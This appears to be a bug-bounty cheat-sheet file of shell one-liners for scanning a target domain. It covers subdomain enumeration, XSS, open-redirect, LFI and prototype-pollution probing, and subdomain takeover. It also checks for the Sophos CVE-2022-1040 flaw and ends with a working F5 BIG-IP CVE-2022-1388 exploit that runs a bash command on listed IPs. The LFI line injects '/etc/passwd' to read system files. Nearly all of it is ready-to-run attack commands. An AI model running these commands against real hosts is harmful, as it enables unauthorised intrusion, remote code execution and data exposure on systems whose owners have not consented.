web_testing.cheat

% Test for XSS Bug in multiple subdomains

# subdirectory finder for domains
subfinder -d <target-domain> -o domains_subfinder_$1

# amass enumeration on target domain
amass enum --passive -d <target-domain> -o domains_$1
cat domains_subfinder_$1 | tee -a domain_$1
cat domains_$1 | filter-resolved | tee -a domains_$1.txt
cat domains_$1.txt | httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt

# Test for Open-Redirect Bug
waybackurls <target-domain> | grep -a -i \=http | bhedak 'http://redirect.com' | while read host do;do curl -s -L $host -I|grep "redirect.com" && echo -e "$host \033[0;31mVulnerable\n" ;done

# Find JS File
assetfinder --subs-only <target-domain> | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done

# Find Subdomains TakeOver
subfinder -d <target-domain> >> domains ; assetfinder --subs-only <target-domain> >> domains ; amass enum -norecursive -noalts -d <target-domain> >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ; 

# Find LFI
gau <target-domain> | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

# Find Prototype Pollution
subfinder -d <target-domain> -all -silent | httpx -silent -threads 300 | anew -q alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"

# Sophos Firewall CVE-2022-1040 (RCE) 
cat sophos_servers | while read host do; do curl --connect-timeout 10 -ks -H "X-Requested-With: XMLHttpRequest" -X POST "https://$host/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"👽":"TEST"\}" | grep -q 'Session Expired' && printf "$host \033[1;41mVulnerable a CVE-2022-1040 (Sophos RCE)\e[0m\n"; done; 

# Exploit F5 Big IP  Using Curl - CVE-2022-1388  
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done